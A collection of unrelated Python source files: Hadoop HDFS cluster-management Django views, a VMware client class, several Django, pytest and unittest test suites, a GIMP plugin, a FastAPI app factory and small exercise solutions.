                        "h.ip=n.ip join hdfs_metrics as hm on h.id=hm.node_id " \
                        "where h.type=0 and hm.updated_at in (select max(updated_at) " \
                        "from hdfs_metrics limit 1)"
    slave_without_client = "select h.*,hm.* from hdfs_hdfs as h join hdfs_metrics as hm on h.id=hm.node_id " \
                           "where h.type=0 and h.ip not in (" + node_with_client + ") and hm.updated_at in " \
                           "(select max(updated_at) from hdfs_metrics limit 1)"
    name_livenodes = []
    name_deadnodes = []
    standby_data = {}
    # Defaults guard against the case where no master row is in the active
    # state — the original raised NameError when building the context below.
    active_data = {}
    safemode = None
    cursor.execute(masters_sql)
    masters = cursor.fetchall()
    colnames = [desc[0] for desc in cursor.description]
    for node in masters:
        c = dict(zip(colnames, node))
        client_installed = True
        if c["ip"] not in all_nodes:
            client_installed = False
        # state: 1 = active, 0/2 = standby variants.
        if c["type"] == 1 and c["state"] == 1:
            safemode = c["safemode"]
            active_data = c
        if c["type"] == 1 and c["state"] == 0:
            c["client_installed"] = client_installed
            standby_data = c
        if c["type"] == 1 and c["state"] == 2:
            c["client_installed"] = client_installed
            standby_data = c
    cursor.execute(slave_with_client)
    nodes_with_client = cursor.fetchall()
    colnames = [desc[0] for desc in cursor.description]
    for node in nodes_with_client:
        c = dict(zip(colnames, node))
        client_installed = True
        if c["ip"] not in all_nodes:
            client_installed = False
        c["client_installed"] = client_installed
        if c["status"] == "RUNNING":
            name_livenodes.append(c)
        else:
            name_deadnodes.append(c)
    cursor.execute(slave_without_client)
    nodes_without_client = cursor.fetchall()
    # NOTE(review): reuses ``colnames`` from the previous query even though the
    # column set differs (no hostname/fqdn/name) — confirm the templates cope.
    for node in nodes_without_client:
        c = dict(zip(colnames, node))
        client_installed = True
        if c["ip"] not in all_nodes:
            client_installed = False
        c["client_installed"] = client_installed
        if c["status"] == "RUNNING":
            name_livenodes.append(c)
        else:
            name_deadnodes.append(c)
    service_object = Services.objects.get(name='hdfs')
    # The restart flag is set when a configuration change requires a restart.
    restart_status_checks = Restart_after_configuration.objects.filter(service_id=service_object.id).exists()
    if restart_status_checks:
        restart_status_check = Restart_after_configuration.objects.get(service_id=service_object.id)
        restart_status = restart_status_check.status
    else:
        restart_status = 0
    context['name_livenodes'] = name_livenodes
    context['name_deadnodes'] = name_deadnodes
    context['restart_status'] = restart_status
    context['active_node'] = active_data
    context['standby_node'] = standby_data
    context["safemode"] = safemode
    context["service_id"] = service_object.id
    return render(request, 'hdfs/hdfs.html', context)
# def prepare_alive_dead_node_list(colnames, lst, all_nodes):
# alive = []
# dead = []
# for node in lst:
# c = dict(zip(colnames, node))
# client_installed = True
# if c["ip"] not in all_nodes:
# client_installed = False
#
# c["client_installed"] = client_installed
# if node[3] == "RUNNING":
# name_livenodes.append(c)
# else:
# name_deadnodes.append(c)
#
# return alive, dead
def dn_restart(request):
    """Restart the datanode at the POSTed ``node_ip`` via its agent API."""
    obj = helper(request)
    # `is not ''` compared identity, not equality (SyntaxWarning on 3.8+).
    if request.POST['node_ip'] != '':
        node_ip = request.POST['node_ip']
    else:
        data = {'success': 0,
                'msg': "We are unable to get the IP of the datanode. Please hard refresh the page and try again"}
        return JsonResponse(data)
    try:
        node = obj.get_node_data(node_ip)
        url = 'http://%s:%s/hadoop/datanode/restart/' % (node_ip, node["port"])
        resp = obj.restart_service(url)
        return JsonResponse(resp)
    except Exception as e:
        # Exception objects are not JSON-serializable; send the message text.
        data = {'success': 0, 'msg': str(e)}
        return JsonResponse(data)
def dn_stop(request):
    """Stop the datanode at the POSTed ``node_ip`` via its agent API."""
    obj = helper(request)
    # `is not ''` compared identity, not equality (SyntaxWarning on 3.8+).
    if request.POST['node_ip'] != '':
        node_ip = request.POST['node_ip']
    else:
        data = {'success': 0,
                'msg': "We are unable to get the IP of the datanode. Please hard refresh the page and try again"}
        return JsonResponse(data)
    try:
        node = obj.get_node_data(node_ip)
        url_stop = 'http://%s:%s/hadoop/datanode/stop/' % (node_ip, node["port"])
        return JsonResponse(obj.stop_service(url_stop))
    except Exception as e:
        # Exception objects are not JSON-serializable; send the message text.
        data = {'success': 0, 'msg': str(e)}
        return JsonResponse(data, safe=False)
def nn_restart(request):
    """Restart the namenode at the POSTed ``node_ip`` via its agent API."""
    obj = helper(request)
    # `is not ''` compared identity, not equality (SyntaxWarning on 3.8+).
    if request.POST['node_ip'] != '':
        node_ip = request.POST['node_ip']
    else:
        data = {'success': 0,
                'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
        return JsonResponse(data)
    try:
        node = obj.get_node_data(node_ip)
        url = 'http://%s:%s/hadoop/namenode/restart/' % (node_ip, node["port"])
        data = obj.restart_service(url)
        return JsonResponse(data)
    except Exception as e:
        # str(e) keeps the error message JSON-serializable and consistent
        # with the sibling views (was ``e.args``).
        data = {'success': 0, 'msg': str(e)}
        return JsonResponse(data)
def nn_stop(request):
    """Stop the namenode at the POSTed ``node_ip`` via its agent API."""
    obj = helper(request)
    # `is not ''` compared identity, not equality (SyntaxWarning on 3.8+).
    if request.POST['node_ip'] != '':
        node_ip = request.POST['node_ip']
    else:
        data = {'success': 0,
                'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
        return JsonResponse(data)
    try:
        node = obj.get_node_data(node_ip)
        url_stop = 'http://%s:%s/hadoop/namenode/stop/' % (node_ip, node["port"])
        data = obj.stop_service(url_stop)
        return JsonResponse(data)
    except Exception as e:
        # Exception objects are not JSON-serializable; send the message text.
        data = {'success': 0, 'msg': str(e)}
        return JsonResponse(data, safe=False)
def h_all_restart(request):
    """Restart the whole HDFS service cluster-wide, driven from ``node_ip``."""
    # `is not ''` compared identity, not equality (SyntaxWarning on 3.8+).
    if request.POST['node_ip'] != '':
        node_ip = request.POST['node_ip']
    else:
        data = {'success': 0,
                'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
        return JsonResponse(data)
    obj = helper(request=request, model=Hdfs)
    op_status = obj.restart_all("hadoop/dfs/restart/", master_ip=node_ip)
    if op_status["success"]:
        # A successful restart clears the "restart needed" flag set by config edits.
        Restart_after_configuration.objects.filter(service_id=obj.get_service_id("hdfs")).update(status=0)
    return JsonResponse(op_status)
def h_all_stop(request):
    """Stop every HDFS daemon cluster-wide and relay the agent's response."""
    obj = helper(request=request, model=Hdfs)
    return JsonResponse(obj.stop_all("hadoop/dfs/stop/"))
def h_kill(request):
    """Kill a NameNode/DataNode process on a node, optionally starting it again.

    POST params: ``node_ip``, ``node_id``, ``server_type`` ("NameNode" or
    anything else for a datanode) and ``action_type`` ("1" = start the
    process again after killing it).
    """
    obj = helper(request=request, model=Hdfs)
    # `is not ''` compared identity, not equality (SyntaxWarning on 3.8+).
    if request.POST['node_ip'] != '':
        node_ip = request.POST['node_ip']
    else:
        data = {'success': 0,
                'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
        return JsonResponse(data)
    if request.POST['node_id'] != '':
        node_id = request.POST['node_id']
    else:
        data = {'success': 0,
                'msg': "We are unable to get the IP of the active namenode. Please hard refresh the page and try again"}
        return JsonResponse(data)
    node = obj.get_node_data(node_ip)
    if request.POST['server_type'] != '':
        server_type = request.POST['server_type']
        if server_type == 'NameNode':
            url_start = 'http://%s:%s/hadoop/namenode/start/' % (node_ip, node["port"])
        else:
            url_start = 'http://%s:%s/hadoop/datanode/start/' % (node_ip, node["port"])
    else:
        data = {'success': 0,
                'msg': "Sorry we didnot receive some of the required data. Please hard refresh the page and try again"}
        return JsonResponse(data)
    if request.POST['action_type'] != '':
        action_type = request.POST['action_type']
    else:
        data = {'success': 0,
                'msg': "Sorry we didnot receive some of the required data. Please hard refresh the page and try again"}
        return JsonResponse(data)
    url = "http://%s:%s/command/kill/" % (node_ip, node["port"])
    try:
        payload = {"service_name": server_type, "node_id": node_id, "table_name": "hdfs_hdfs"}
        r = requests.post(url, headers={"API-KEY": helper.get_api_key()}, data=json.dumps(payload))
        if r.status_code != 200:
            # str() the status code: concatenating an int to str raised TypeError.
            return JsonResponse({'success': 0, 'msg': 'server threw status code ' + str(r.status_code)})
        data = r.json()
        if data["success"] == 1:
            if action_type == "1":
                try:
                    r_start = requests.get(url_start, headers={"API-KEY": helper.get_api_key()},
                                           data=json.dumps({"cluster_id": int(obj.cluster_id)}))
                    # Wrap in JsonResponse: a Django view must not return a plain dict.
                    if r_start.status_code != 200:
                        return JsonResponse(r_start.json())
                    if r_start.json()['success'] != 1:
                        return JsonResponse(r_start.json())
                except Exception as e:
                    data = {'success': 0, 'msg': str(e)}
                    return JsonResponse(data)
            # Report the kill (and optional start) outcome; the original
            # fell through here and returned None.
            return JsonResponse(data)
        else:
            return JsonResponse(data)
    except ConnectionError as e:
        # Exception objects are not JSON-serializable; send the message text.
        data = {'success': 0, 'msg': str(e)}
        return JsonResponse(data)
|
# vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vas.shared.Deletable import Deletable
from vas.shared.MutableCollection import MutableCollection
from vas.shared.Resource import Resource
class InstallationImages(MutableCollection):
    """A collection of installation images

    :ivar `vas.shared.Security.Security`    security:   The resource's security
    """

    def __init__(self, client, location, installation_image_class):
        # 'installation-images' is the JSON collection key on the server side.
        super(InstallationImages, self).__init__(client, location, 'installation-images', installation_image_class)

    def create(self, path, version):
        """Creates an installation image by uploading a file to the server and assigning it a version

        :param str  path:       The path of the file to upload
        :param str  version:    The installation image's version
        :rtype:     :class:`vas.shared.InstallationImages.InstallationImage`
        :return:    The new installation image
        """
        return self._create_multipart(path, {'version': version})
class InstallationImage(Resource, Deletable):
    """A product binary, typically are .zip or .tar.gz file, that has been uploaded to the server. Once created, an
    installation image can then be used to create an installation on a group.

    :ivar `vas.shared.Installations.Installations`  installations:  The installations that have been created from the
                                                                    installation image
    :ivar `vas.shared.Security.Security`            security:       The resource's security
    :ivar int                                       size:           The installation image's size
    :ivar str                                       version:        The installation image's version
    """

    @property
    def installations(self):
        # Lazily build the installation resources from the 'installation' links.
        self.__installations = self.__installations or self._create_resources_from_links('installation',
            self.__installation_class)
        return self.__installations

    @property
    def size(self):
        return self.__size

    @property
    def version(self):
        return self.__version

    def __init__(self, client, location, installation_class):
        super(InstallationImage, self).__init__(client, location)
        self.__installation_class = installation_class
        self.__size = self._details['size']
        self.__version = self._details['version']
        # Initialize the lazy cache: without this, the first access to
        # ``installations`` raised AttributeError because only ``reload``
        # ever assigned the attribute.
        self.__installations = None

    def reload(self):
        """Reloads the installation image's details from the server"""
        super(InstallationImage, self).reload()
        # Drop the cache so the next property access refetches the links.
        self.__installations = None

    def __str__(self):
        return "<{} version={} size={}>".format(self.__class__.__name__, self.__version, self.__size)
|
from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.urls import reverse
from bills.models import BillSet, Bill
from houses.models import House
from utils.models import BillFile
class BillsViewsTests(TestCase):
    """Integration tests for the bill views.

    Each test checks: HTTP 200 after redirects, the template rendered,
    page markers ('404' / 'Login'), and that the Bill/BillSet/BillFile row
    counts changed (or not) as expected for that scenario.
    """

    def setUp(self):
        # Two users: self.user owns the house/bills, self.user2 is the
        # "wrong user" for the permission tests.
        self.client = Client()
        User = get_user_model()
        self.user = User.objects.create_user(username='FredFlintstone', email='fred@flintstone.com', password='babadoo')
        self.user2 = User.objects.create_user(username='JackyFlintstone', email='jacky@flintstone.com', password='lovefred')
        house = House.objects.create(user=self.user)
        house.place_id = 'EiwyNTI5IFN0YWxsaW9uIERyLCBPc2hhd2EsIE9OIEwxSCA3SzQsIENhbmFkYSIxEi8KFAoSCY_JD3vDG9WJEe3JFhlBvwOKEOETKhQKEgnrS9FlwxvViRHYx20MM9m-8g'
        house.lat = '43.95858010000001'
        house.lon = '-78.91587470000002'
        house.street_number = 2529
        house.street_name = 'Stallion Drive'
        house.city = 'Oshawa'
        house.prov_state = 'ON'
        house.postal_code = 'L1H 0M4'
        house.country = 'Canada'
        house.save()
        self.house = house
        # One bill set with a single electricity bill to delete/attach to.
        self.billset = BillSet.objects.create(month=11, year=2019, house=self.house)
        self.bill = Bill.objects.create(set=self.billset, user=self.user, type='ELEC', date='2019-11-04', amount=299.99)

    def test_bill_delete_view_get(self):
        """GET on bill_delete must not delete anything (confirmation only)."""
        print('Testing bills.views.bill_delete() GET')
        self.client.force_login(self.user)
        bill_pre_count = Bill.objects.count()
        billset_pre_count = BillSet.objects.count()
        response = self.client.get(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
        bill_post_count = Bill.objects.count()
        billset_post_count = BillSet.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'houses/house_detail.html')
        self.assertNotContains(response, '404')
        self.assertNotContains(response, 'Login')
        self.assertEqual(bill_post_count, bill_pre_count)
        self.assertEqual(billset_post_count, billset_pre_count)

    def test_bill_delete_view_get_not_logged_in(self):
        """Anonymous GET redirects to the login page; counts unchanged."""
        print('Testing bills.views.bill_delete() GET not logged in')
        self.client.logout()
        bill_pre_count = Bill.objects.count()
        billset_pre_count = BillSet.objects.count()
        response = self.client.get(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
        bill_post_count = Bill.objects.count()
        billset_post_count = BillSet.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'account/login.html')
        self.assertNotContains(response, '404')
        self.assertContains(response, 'Login')
        self.assertEqual(bill_post_count, bill_pre_count)
        self.assertEqual(billset_post_count, billset_pre_count)

    def test_bill_delete_view_get_wrong_user(self):
        """Another user's GET gets the 404 page; counts unchanged."""
        print('Testing bills.views.bill_delete() GET wrong user')
        self.client.force_login(self.user2)
        bill_pre_count = Bill.objects.count()
        billset_pre_count = BillSet.objects.count()
        response = self.client.get(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
        bill_post_count = Bill.objects.count()
        billset_post_count = BillSet.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'main/404.html')
        self.assertContains(response, '404')
        self.assertNotContains(response, 'Login')
        self.assertEqual(bill_post_count, bill_pre_count)
        self.assertEqual(billset_post_count, billset_pre_count)

    def test_bill_delete_view_post(self):
        """POST deletes the bill; a second bill keeps the set alive."""
        print('Testing bills.views.bill_delete() POST')
        self.client.force_login(self.user)
        self.bill2 = Bill.objects.create(set=self.billset, user=self.user, type='WATER', date='2019-11-04', amount=500.99)
        bill_pre_count = Bill.objects.count()
        billset_pre_count = BillSet.objects.count()
        response = self.client.post(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
        bill_post_count = Bill.objects.count()
        billset_post_count = BillSet.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'houses/house_detail.html')
        self.assertNotContains(response, '404')
        self.assertNotContains(response, 'Login')
        self.assertLess(bill_post_count, bill_pre_count)
        self.assertEqual(billset_post_count, billset_pre_count)

    def test_bill_delete_view_post_remove_empty_set(self):
        """Deleting the only bill also removes its now-empty bill set."""
        print('Testing bills.views.bill_delete() POST also remove empty billset')
        self.client.force_login(self.user)
        bill_pre_count = Bill.objects.count()
        billset_pre_count = BillSet.objects.count()
        response = self.client.post(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
        bill_post_count = Bill.objects.count()
        billset_post_count = BillSet.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'houses/house_detail.html')
        self.assertNotContains(response, '404')
        self.assertNotContains(response, 'Login')
        self.assertLess(bill_post_count, bill_pre_count)
        self.assertLess(billset_post_count, billset_pre_count)

    def test_bill_delete_view_post_not_logged_in(self):
        """Anonymous POST redirects to login; nothing is deleted."""
        print('Testing bills.views.bill_delete() POST not logged in')
        self.client.logout()
        bill_pre_count = Bill.objects.count()
        billset_pre_count = BillSet.objects.count()
        response = self.client.post(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
        bill_post_count = Bill.objects.count()
        billset_post_count = BillSet.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'account/login.html')
        self.assertNotContains(response, '404')
        self.assertContains(response, 'Login')
        self.assertEqual(bill_post_count, bill_pre_count)
        self.assertEqual(billset_post_count, billset_pre_count)

    def test_bill_delete_view_post_wrong_user(self):
        """Another user's POST gets the 404 page; nothing is deleted."""
        print('Testing bills.views.bill_delete() POST wrong user')
        self.client.force_login(self.user2)
        bill_pre_count = Bill.objects.count()
        billset_pre_count = BillSet.objects.count()
        response = self.client.post(reverse('bill_delete', kwargs={'pk': self.bill.id}, ), follow=True)
        bill_post_count = Bill.objects.count()
        billset_post_count = BillSet.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'main/404.html')
        self.assertContains(response, '404')
        self.assertNotContains(response, 'Login')
        self.assertEqual(bill_post_count, bill_pre_count)
        self.assertEqual(billset_post_count, billset_pre_count)

    def test_bill_add_file_get(self):
        """Owner can open the add-file form; no BillFile is created by GET."""
        print('Testing bills.views.bill_add_file() GET')
        self.client.force_login(self.user)
        billfile_pre_count = BillFile.objects.count()
        response = self.client.get(reverse('bill_add_file', kwargs={'pk': self.bill.id}, ), follow=True)
        billfile_post_count = BillFile.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'bills/bill_add_file.html')
        self.assertContains(response, self.bill.set.house)
        self.assertNotContains(response, '404')
        self.assertNotContains(response, 'Login')
        self.assertEqual(billfile_post_count, billfile_pre_count)

    def test_bill_add_file_get_not_logged_in(self):
        """Anonymous GET on add-file redirects to login."""
        print('Testing bills.views.bill_add_file() GET not logged in')
        self.client.logout()
        billfile_pre_count = BillFile.objects.count()
        response = self.client.get(reverse('bill_add_file', kwargs={'pk': self.bill.id}, ), follow=True)
        billfile_post_count = BillFile.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'account/login.html')
        self.assertNotContains(response, self.bill.set.house)
        self.assertNotContains(response, '404')
        self.assertContains(response, 'Login')
        self.assertEqual(billfile_post_count, billfile_pre_count)

    def test_bill_add_file_get_wrong_user(self):
        """Another user's GET on add-file gets the 404 page."""
        print('Testing bills.views.bill_add_file() GET wrong user')
        self.client.force_login(self.user2)
        billfile_pre_count = BillFile.objects.count()
        response = self.client.get(reverse('bill_add_file', kwargs={'pk': self.bill.id}, ), follow=True)
        billfile_post_count = BillFile.objects.count()
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'main/404.html')
        self.assertNotContains(response, self.bill.set.house)
        self.assertContains(response, '404')
        self.assertNotContains(response, 'Login')
        self.assertEqual(billfile_post_count, billfile_pre_count)
#!/usr/bin/env python2
import sys
from os.path import dirname, realpath
sys.path.append(realpath(dirname(__file__)))
import gimpfu as gfu
from gimpfu import main
from _plugin_base import GimpPluginBase
class FaceGen(GimpPluginBase):
    """GIMP plugin that runs MaskGAN-based face generation on three layers."""
    def run(self, img_layer, mask_layer, mask_m_layer):
        # Model script is resolved by GimpPluginBase; the prediction result
        # is inserted into the image as a new layer.
        self.model_file = 'MaskGAN.py'
        result = self.predict(img_layer, mask_layer, mask_m_layer)
        self.create_layer(result)
plugin = FaceGen()
# Register the plugin in GIMP's procedure database; the three layer
# parameters are the original image, its mask, and the user-edited mask.
plugin.register(
    proc_name="facegen",
    blurb="facegen",
    help="Running face gen...",
    author="Kritik Soman",
    copyright="",
    date="2020",
    label="facegen...",
    imagetypes="RGB*",
    params=
    [
        (gfu.PF_LAYER, "drawinglayer", "Original Image:", None),
        (gfu.PF_LAYER, "drawinglayer", "Original Mask:", None),
        (gfu.PF_LAYER, "drawinglayer", "Modified Mask:", None),
    ]
)
# Hand control to GIMP's Python-Fu main loop.
main()
|
#!/usr/bin/env python3
import math
# Tank-painting calculator (prompts are in Hungarian).
print("Tartály festése" + "\n")
magassag = float(input("Milyen magas? "))  # tank height
sugar = float(input("Mennyi az átmérője? ")) / 2  # radius from diameter
# Closed-cylinder surface area: 2*pi*r*(r + h).
felulet = 2 * math.pi * sugar * (sugar + magassag)
# Assumes one box of paint covers 2 area units; the result may be
# fractional (no rounding up) — presumably intentional, confirm.
dobozok_szama = felulet / 2
print(dobozok_szama, "doboz festék kell.")
|
class Newssources:
    """Model describing a news source returned by the news API."""

    # Attribute names in constructor-argument order.
    _FIELDS = ('id', 'name', 'description', 'url', 'category', 'language', 'country')

    def __init__(self, id, name, description, url, category, language, country):
        """Store every field verbatim as an instance attribute."""
        values = (id, name, description, url, category, language, country)
        for attr, value in zip(self._FIELDS, values):
            setattr(self, attr, value)
class Newsarticle:
    """Model describing a single news article returned by the news API."""

    # Attribute names in constructor-argument order.
    _FIELDS = ('source_id', 'source_name', 'author', 'title', 'description',
               'url', 'urlToImage', 'publishedAt')

    def __init__(self, source_id, source_name, author, title, description, url, urlToImage, publishedAt):
        """Store every field verbatim as an instance attribute."""
        values = (source_id, source_name, author, title, description,
                  url, urlToImage, publishedAt)
        for attr, value in zip(self._FIELDS, values):
            setattr(self, attr, value)
import unittest
from src.graph import Graph
from src.breadth_first_search import bfs
class BreadthFirstSearchTest(unittest.TestCase):
    def test_bfs_parses_the_graph_in_order(self):
        """
        Correctly explore the following graph:
             _(a)--(c)--(e)
            /  |  /  \  |
          (s)--(b)-------(d)
        """
        edge_list = [('s', 'a'), ('s', 'b'), ('a', 'b'), ('a', 'c'), ('b', 'd'),
                     ('c', 'e'), ('c', 'd'), ('e', 'd')]
        graph = Graph.build(edges=edge_list)
        visit_order = bfs(graph, 's')
        self.assertEqual(visit_order, ['s', 'a', 'b', 'c', 'd', 'e'],
                         'should have visited the graph in correct order')
|
from pathlib import Path
import uvicorn
from fastapi import FastAPI
from fastapi.staticfiles import StaticFiles
from starlette.middleware.cors import CORSMiddleware
from app.core import config
from app.core.routes import core_router
def get_application() -> FastAPI:
    """Create and configure the FastAPI application instance."""
    fastapi_app = FastAPI(title=config.PROJECT_NAME, debug=config.DEBUG)

    # Allow cross-origin requests from the configured hosts, or from
    # anywhere when no hosts are configured.
    fastapi_app.add_middleware(
        CORSMiddleware,
        allow_origins=config.ALLOWED_HOSTS or ["*"],
        allow_credentials=True,
        allow_methods=["*"],
        allow_headers=["*"],
    )

    fastapi_app.include_router(core_router)

    # Serve static files only when the static directory actually exists.
    if Path(config.STATIC_ROOT).exists():
        fastapi_app.mount(config.STATIC_URL, StaticFiles(directory=config.STATIC_ROOT), name="static")

    return fastapi_app
# Application instance used by ASGI servers (e.g. `uvicorn app.main:app`).
app = get_application()
if __name__ == "__main__":
    # entry point for starting the app as python script - `python main.py` will start the worker
    uvicorn.run(app, host="0.0.0.0", port=8000)
|
"""Tests for register_mongodb.py"""
from flask import Flask
from flask_pymongo import PyMongo
from foca.database.register_mongodb import (
create_mongo_client,
register_mongodb,
)
from foca.models.config import MongoConfig
# Minimal MongoDB connection settings shared by all the configs below.
MONGO_DICT_MIN = {
    'host': 'mongodb',
    'port': 27017,
}
# One database with no collections defined.
DB_DICT_NO_COLL = {
    'my_db': {
        'collections': None
    }
}
# One database with a collection but no custom indexes.
DB_DICT_DEF_COLL = {
    'my_db': {
        'collections': {
            'my_collection': {
                'indexes': None,
            }
        }
    }
}
# One database with a collection carrying a custom (sparse=False) index.
DB_DICT_CUST_COLL = {
    'my_db': {
        'collections': {
            'my_collection': {
                'indexes': [{
                    'keys': {'indexed_field': 1},
                    'options': {'sparse': False}
                }]
            }
        }
    }
}
# Prebuilt MongoConfig fixtures used by the tests below.
MONGO_CONFIG_MINIMAL = MongoConfig(**MONGO_DICT_MIN, dbs=None)
MONGO_CONFIG_NO_COLL = MongoConfig(**MONGO_DICT_MIN, dbs=DB_DICT_NO_COLL)
MONGO_CONFIG_DEF_COLL = MongoConfig(**MONGO_DICT_MIN, dbs=DB_DICT_DEF_COLL)
MONGO_CONFIG_CUST_COLL = MongoConfig(**MONGO_DICT_MIN, dbs=DB_DICT_CUST_COLL)
def test_create_mongo_client(monkeypatch):
    """MONGO_USERNAME is set to the literal string 'None' (i.e. not a real user)."""
    monkeypatch.setenv("MONGO_USERNAME", 'None')
    client = create_mongo_client(app=Flask(__name__))
    assert isinstance(client, PyMongo)
def test_create_mongo_client_auth(monkeypatch):
    """MONGO_USERNAME environment variable IS defined with a real user name."""
    monkeypatch.setenv("MONGO_USERNAME", "TestingUser")
    client = create_mongo_client(Flask(__name__))
    assert isinstance(client, PyMongo)
def test_create_mongo_client_auth_empty(monkeypatch):
    """MONGO_USERNAME environment variable IS defined but holds an empty string."""
    monkeypatch.setenv("MONGO_USERNAME", '')
    client = create_mongo_client(Flask(__name__))
    assert isinstance(client, PyMongo)
def test_register_mongodb_no_database():
    """Registration is skipped when no databases are configured."""
    result = register_mongodb(app=Flask(__name__), conf=MONGO_CONFIG_MINIMAL)
    assert isinstance(result, MongoConfig)
def test_register_mongodb_no_collections():
    """A database without any collections still registers cleanly."""
    result = register_mongodb(app=Flask(__name__), conf=MONGO_CONFIG_NO_COLL)
    assert isinstance(result, MongoConfig)
def test_register_mongodb_def_collections():
    """A database with a collection using default indexes registers cleanly."""
    result = register_mongodb(app=Flask(__name__), conf=MONGO_CONFIG_DEF_COLL)
    assert isinstance(result, MongoConfig)
def test_register_mongodb_cust_collections(monkeypatch):
    """A database with collections carrying custom indexes registers cleanly."""
    # Stub out the pymongo index operations so no real server is needed.
    for target in (
        'pymongo.collection.Collection.create_index',
        'pymongo.collection.Collection.drop_indexes',
    ):
        monkeypatch.setattr(target, lambda *args, **kwargs: None)
    result = register_mongodb(app=Flask(__name__), conf=MONGO_CONFIG_CUST_COLL)
    assert isinstance(result, MongoConfig)
|
# FindStringusingRecursive.py
# Create a function that you return True if the exat word is find in the string or sentence
# string = "I love bananas and apples."
# is the word ana in the string/sentence? return True
# is the word live in the string/sentence ? return False
# if the string/sentence or the word is empty return False
def solution(string, substring, i=0):
    """Return True if `substring` occurs in `string`, ignoring whitespace.

    Returns False when either the (whitespace-stripped) string or the
    substring is empty.

    The original implementation advanced the scan by an ever-growing step
    (`string[i:]` with an incrementing `i`), so positions 2, 4, 5, ... were
    never checked and matches could be missed (e.g. "xydog"/"dog" -> False).
    The scan now advances exactly one character per recursive step.  The
    `i` parameter is kept only for backward compatibility and is unused.
    """
    string = ''.join(string.split())  # get rid of all spaces
    if len(string) == 0 or len(substring) == 0:  # empty input -> False
        return False
    if string.startswith(substring):  # match at the current position
        return True
    # slide the window forward by one character
    return solution(string[1:], substring)
# Testing: expected output is True then False ("Oamorélindo!" does not
# contain "amora" once the spaces are removed).
print(solution("amora","amor"))
print(solution("O amor é lindo!","amora"))
|
class Solution:
    """Baseball-game score tally (LeetCode 682 'Baseball Game')."""

    def calPoints(self, ops: 'List[str]') -> int:
        """Apply each op to a score stack and return the total.

        'C' cancels the previous score, 'D' doubles the last score,
        '+' adds the last two scores, anything else is an integer score.
        """
        scores = []
        for token in ops:
            if token == 'C':
                del scores[-1]
            elif token == 'D':
                scores.append(scores[-1] * 2)
            elif token == '+':
                scores.append(scores[-2] + scores[-1])
            else:
                scores.append(int(token))
        return sum(scores)
if __name__ == "__main__":
    # Quick manual check against the two LeetCode sample cases (30 and 27).
    print(Solution().calPoints(["5","2","C","D","+"]))
    print(Solution().calPoints(["5","-2","4","C","D","9","+","+"]))
"""
pytest.fixture() 允许fixture有参数化功能
@pytest.mark.parametrize 允许在测试函数或类中定义多组参数和fixtures
pytest_generate_tests 允许定义自定义参数化方案或扩展(拓展)
"""
import pytest
@pytest.mark.parametrize("test_input,expected", [("3+5", 8), ("2+4", 6), ("6*9", 42)])
def test_eval(test_input, expected):
print(f"测试数据{test_input},期望结果{expected}")
assert eval(test_input) == expected
@pytest.mark.parametrize('a, b, expect', [(1, 2, 3), (2, 3, 5), (4, 5, 6)])
class TestParametrize:
    """Class-level parametrize: the same data sets apply to every method."""

    def test_parametrize_1(self, a, b, expect):
        print('\n测试函数11111 测试数据为\n{}-{}'.format(a, b))
        total = a + b
        assert total == expect

    def test_parametrize_2(self, a, b, expect):
        print('\n测试函数22222 测试数据为\n{}-{}'.format(a, b))
        total = a + b
        assert total == expect
# Cartesian product: stacked parametrize decorators combine the data sets.
data_1 = [1, 2, 3]
data_2 = ['a', 'b']
@pytest.mark.parametrize('a', data_1)
@pytest.mark.parametrize('b', data_2)
def test_parametrize_1(a, b):
    # runs once per (a, b) pair: 3 * 2 = 6 generated test cases
    print(f'笛卡尔积 测试数据为 : {a},{b}')
# Dict-shaped parameters: each dict in the tuple becomes one test case.
data_1 = (
    {
        'user': 1,
        'pwd': 2
    },
    {
        'user': 3,
        'pwd': 4
    }
)
@pytest.mark.parametrize('dic', data_1)
def test_parametrize_2(dic):
    # the whole dict is passed in as a single argument
    print(f'测试数据为\n{dic}')
    print(f'user:{dic["user"]},pwd{dic["pwd"]}')
# Marked parametrization: individual cases can carry xfail/skip marks.
@pytest.mark.parametrize("test_input,expected", [
    ("3+5", 8),
    ("2+4", 6),
    pytest.param("6 * 9", 42, marks=pytest.mark.xfail),
    pytest.param("6*6", 42, marks=pytest.mark.skip)
])
def test_mark(test_input, expected):
    result = eval(test_input)
    assert result == expected
# Readable test IDs
data_1 = [
    (1, 2, 3),
    (4, 5, 9)
]
# Build one human-readable id per parameter tuple.
ids = ["a:{} + b:{} = expect:{}".format(a, b, expect) for a, b, expect in data_1]
# ids = ["1","2"]  There must be exactly one id per data tuple; the ids make
# the meaning of each generated test case easier to see in reports.
